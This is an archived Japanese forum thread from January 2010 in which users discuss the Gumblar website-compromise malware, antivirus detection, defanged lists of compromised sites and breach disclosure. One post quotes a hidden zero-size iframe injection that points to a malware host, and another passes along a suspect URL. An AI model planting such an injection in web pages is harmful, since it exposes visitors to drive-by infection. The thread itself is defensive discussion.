> DEFがデフォルトで有効になっているIE 8へのアップグレードを勧告している。
> しかし仏セキュリティ企業のVUPENが、DEPをかわす方法が見つかったと発表するなど状況は変わりつつある。
143:名無しさん@お腹いっぱい。
10/01/20 08:22:04
>>142のPoCマダー!?
144:名無しさん@お腹いっぱい。
10/01/20 08:52:23
今しがたNHKでガンブラー特集やってたけど
対策はウィルスソフト更新しろとしか言わないのな
JAVA、PDF云々は言わないってのはやっぱなんか裏にあるのかな?
145:名無しさん@お腹いっぱい。
10/01/20 08:54:28
キーロガーの実験失敗しててわろた。
146:名無しさん@お腹いっぱい。
10/01/20 08:56:36
|
|
{ ! _,, -ェェュ、 |
ィ彡三ミヽ `ヽ ,ィハミミミミミミミミミヽ、|
彡'⌒ヾミヽ `ー /ililハilミilミliliミliliミliliミ|
ヾ、 /iiiiイ!ヾヾミ、ミニ=ー-ミ|
_ `ー―' i!ハ:.:.\\_::::::::::::::/:.| NHKは
彡三ミミヽ i! ヽ:.:.:.:冫': : :::/,,∠|
彡' ヾ、 _ノ i!::: ̄二ー:: : ::::ソ ・ ,| 太陽と煉瓦に
`ー ' {ヘラ' ・_>シ;テツ"''''"|
,ィ彡三ニミヽ __ノ ヽヘ`" 彡' 〈 | 監視されて
彡' ` ̄ `\ ー-=ェっ |
_ __ ノ {ミ;ヽ、 ⌒ | います
,ィ彡'  ̄ ヾミミミミト-- ' |
ミ三彡' /⌒ / ̄ ̄ | : ::::::::::|
ィニニ=- ' / i `ー-(二つ
,ィ彡' { ミi (二⊃
// / l ミii ト、二)
彡' __,ノ | ミソ :..`ト-'
/ | ミ{ :.:.:..:|
ノ / ヾ\i、 :.:.:.:.:|
ィニ=-- '" / ヾヾiiヽ、 :.:.:.:.::::|
/ / `/ ̄ ̄7ハヾヾ : .:.:.|
ノ _/ / / |:. :.:.:.:.:.:.:|
147:名無しさん@お腹いっぱい。
10/01/20 08:56:40
>>144
素人に細かい設定なんか無理だろって思ってんじゃね?
NHKならPCの苦手な年寄りも多く見てるだろうし
148:名無しさん@お腹いっぱい。
10/01/20 08:58:49
しかしあれだな、設定いじってJAVA切りやなんやしてても前ほど気軽にサイト巡り
しなくなってしまった
149:名無しさん@お腹いっぱい。
10/01/20 09:02:50
昨日見かけたURL、マイクロさんがはじめてブロックしました。
ここどーですか?
22 名前: バールのようなもの(不明なsoftbank)[] 投稿日:2010/01/19(火) 18:44:39.14 ID:64+L9xsa
【サンプル動画】
97 名前:名無し募集中。。。[] 投稿日:2010/01/19(火) 16:02:03.04 0
h t t p : / / www.prestige-av.com/ec/index.php?main_page=show_movie&product_model=EVO-118
150:名無しさん@お腹いっぱい。
10/01/20 09:13:55
最近のClamAVのMLを見る限りGumblarの亜種大杉
PDFだけでも20〜30、さらにあったか・・・
151:名無しさん@お腹いっぱい。
10/01/20 09:16:55
>>128みたいなことをすると>>134のようになるので非推奨。
152:名無しさん@お腹いっぱい。
10/01/20 09:47:30
>>48
ちょw
153:名無しさん@お腹いっぱい。
10/01/20 09:50:18
>>141
Pandaクラウドになったら検知率上がったみたい
154:名無しさん@お腹いっぱい。
10/01/20 10:11:27
SSLなFTPを使ってる場合でもFTPのIDとパス抜かれることもあるんでしょうか?
155:名無しさん@お腹いっぱい。
10/01/20 12:07:42
JPCERTから確認メールが来たので。
報告した中からgoogleでURLを検索して検索数が多かった被害サイト
smartlifestyle.sakura.ne●jp/ 58500
www.iyashisalon-navi●net/ 34200 サイト全体
nakano.main●jp/ 16000
cash-you●com/ 11100
www.f-ture●com/ 9890
monde.client●jp/ 7050 monde.client●jp/monde/02.html とか数ページ
eefy.fem●jp/ 6040
156:名無しさん@お腹いっぱい。
10/01/20 13:58:14
CODE1の新型?にくっついてたけど・・
---↓ここから↓---
<iframe umcoq='HwL7BETd' src='hURLリンク(liveiframe)<)●ws/in●cgi?8 '
wcxjb='QMXsIujE' width='0' height='0' style='display:none'></iframe>
---↑ここまで↑---
今度は「あふぃ」でも始めたのか?
157:名無しさん@お腹いっぱい。
10/01/20 14:30:51
mbspro2●uic●to/user/melraia●html
ここやられてる?
158:名無しさん@お腹いっぱい。
10/01/20 14:47:37
ここで報告されてるウイルスってPCサイトビューアーでも感染するのか?
159:名無しさん@お腹いっぱい。
10/01/20 14:48:53
windowsかんけーないから大丈夫
160:名無しさん@お腹いっぱい。
10/01/20 14:50:50
>>159って>>158へ?
そうですか…最近携帯にも感染するウイルスってのもいるみたいだから…
161:名無しさん@お腹いっぱい。
10/01/20 15:00:52
それとこれとは関係ないと思う
162:名無しさん@お腹いっぱい。
10/01/20 15:17:07
>>156
PDF大好きなin.cgiやin.phpはかなり前から見かける。
微妙に別系統(完全に別とは思わんけど)な気がする。
163:名無しさん@お腹いっぱい。
10/01/20 16:22:24
>>7 のポート135閉じようと思ったんだけど、
実行ファイルのパスに
C:\WINDOWS\system32\svchost -k rpcss
とあって、スタートアップの種類が自動から変えられない・・。
これは何なんでしょうか?
164:名無しさん@お腹いっぱい。
10/01/20 16:33:16
>>163
カスペルスキー使ってない?
だとしたら犯人はカスペルスキーだ。
165:名無しさん@お腹いっぱい。
10/01/20 16:34:47 BE:1056145267-PLT(12031)
>>163
>>7はルータ(ブロードバンドルータ含む)があれば普通はアクセスできないから設定不要だよ
166:名無しさん@お腹いっぱい。
10/01/20 16:36:57
【速報】JEITA(電子情報技術産業協会)のサイトが一時停止 〜 Gumblar被害か?
167:名無しさん@お腹いっぱい。
10/01/20 16:39:21
>>166
ぐぐるキャッシュに/*LGPL*/
168:名無しさん@お腹いっぱい。
10/01/20 16:39:28
ガムビルアー
169:名無しさん@お腹いっぱい。
10/01/20 16:47:29
>>164
カスペルスキーは使ってないです。ソフトはESET Smart
>>165
なるほどw 了解です
設定変えられないから、ウィルスにでも感染してるのかと心配になったよ。
回答サンクス
170:名無しさん@お腹いっぱい。
10/01/20 16:57:21
何やってんだ > 鯖缶
171:名無しさん@お腹いっぱい。
10/01/20 17:01:58
鯖缶をボッコボコにしてぐつぐつ煮込んで鯖缶缶を作りたい
172:名無しさん@お腹いっぱい。
10/01/20 17:11:05
鯖缶は製造後半年ぐらいからが食べ頃
美味いのは一年目ぐらいだな
173:名無しさん@お腹いっぱい。
10/01/20 17:16:10
つーかGENOが対策を怠ったからこうなったんだろ
あいつらは責任とって自決するべきだ
あそこまでして業務停止命令が下らないなんて世の中おかしいよ
174:名無しさん@お腹いっぱい。
10/01/20 17:36:36
またGENOとかアホか
175:名無しさん@お腹いっぱい。
10/01/20 17:41:04
癌ブラーはどこまで転移してますか?
176:名無しさん@お腹いっぱい。
10/01/20 18:30:24 BE:452633292-PLT(12031)
ドメインに使われている名称'geno'は現状に適しないと考え、新ドメインに移転することになりました。
ブックマーク等の変更をお願い致します。
URLリンク(gumblarchecker.crz.jp)
GumblarChecker2=URLリンク(gumblarchecker.crz.jp)
177:名無しさん@お腹いっぱい。
10/01/20 18:35:36
>>117
多分他にも。
というかMTのテンプレファイルもやられるっぽい。
MTで作ったサイトが全ページあうあうだった。
しかし、小さな会社だと「改ざんされてたアルよ・・・」って告知するとダメージ大きいよなぁ。
そんな理由で告知しないところが多数なんだけど、やっぱ告知すべきなのかね?
178:名無しさん@お腹いっぱい。
10/01/20 18:37:00
>>176
あー、お疲れ様です。
あ、書き忘れてたけど、avastがようやく8080スクリプトを検出してくれるようになった。
他のソフトどうよ?
179:名無しさん@お腹いっぱい。
10/01/20 18:40:59
Aviraは本体only
180:名無しさん@お腹いっぱい。
10/01/20 18:41:38
>>166
広報に凸してみました
笑ってました(何故?
URLリンク(www.jeita.or.jp)
新JEITA本部事務所〒101-0065
東京都千代田区西神田3-2-1
千代田ファーストビル南館
総合企画部(企画グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(政策グループ) TEL:03-5275-7253 / FAX:03-5212-8121
総合企画部(調査グループ) TEL:03-5275-7255 / FAX:03-5212-8121
総合企画部(広報室) TEL:03-5275-7254 / FAX:03-5212-8123
総合企画部(安全担当) TEL:03-5275-7256 / FAX:03-5212-8121
知的基盤部 TEL:03-5275-7259 / FAX:03-5212-8122
知的基盤部(補償金管理室) TEL:03-5212-8131 / FAX:03-5212-8132
国際部 TEL:03-5275-7263 / FAX:03-5212-8122
環境部 TEL:03-5275-7257 / FAX:03-5212-8121
コンシューマ・プロダクツ部 TEL:03-5275-7260 / FAX:03-5212-8122
コンシューマ・プロダクツ部
(特定プロジェクト推進室) TEL:03-5275-7260 / FAX:03-5212-8122
インダストリ・システム部 TEL:03-5275-7261 / FAX:03-5212-8122
電子部品部
TEL:03-5275-7262 / FAX:03-5212-8122
電子デバイス部 TEL:03-5275-7258 / FAX:03-5212-8121
総務部(総務グループ) TEL:03-5275-7251 / FAX:03-5212-8121
総務部(経理グループ) TEL:03-5275-7252 / FAX:03-5212-8121
総務部(会員サービスグーループ) TEL:03-5212-8255 / FAX:03-5212-8130
関連組織[移転事務所のみ]
有限責任中間法人 ITセキュリティセンター
Information Technology Security Center
〒101-0065 東京都千代田区西神田3-2-1 千代田ファーストビル南館
TEL:03-5212-8271 / FAX:03-5212-8272
181:名無しさん@お腹いっぱい。
10/01/20 18:48:44
>>177
無能管理者のせいで客のPCを被害にあわせてるのに告知しないほうがおかしい
まあ客も馬鹿だけど隠蔽するのは悪質すぎる
182:名無しさん@お腹いっぱい。
10/01/20 18:51:38
ヒューリスティックエンジンを搭載した「avast! Free Antivirus」v5.0が公開
スレリンク(news板)
183:名無しさん@お腹いっぱい。
10/01/20 18:53:27
Gumblar: べつになんでもないこと
URLリンク(puppet.asablo.jp)
ガンブラー vs avast! - smilebanana
URLリンク(www.smilebanana.com)
この辺のブログも要チェック。
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5082日前に更新/228 KB
担当:undef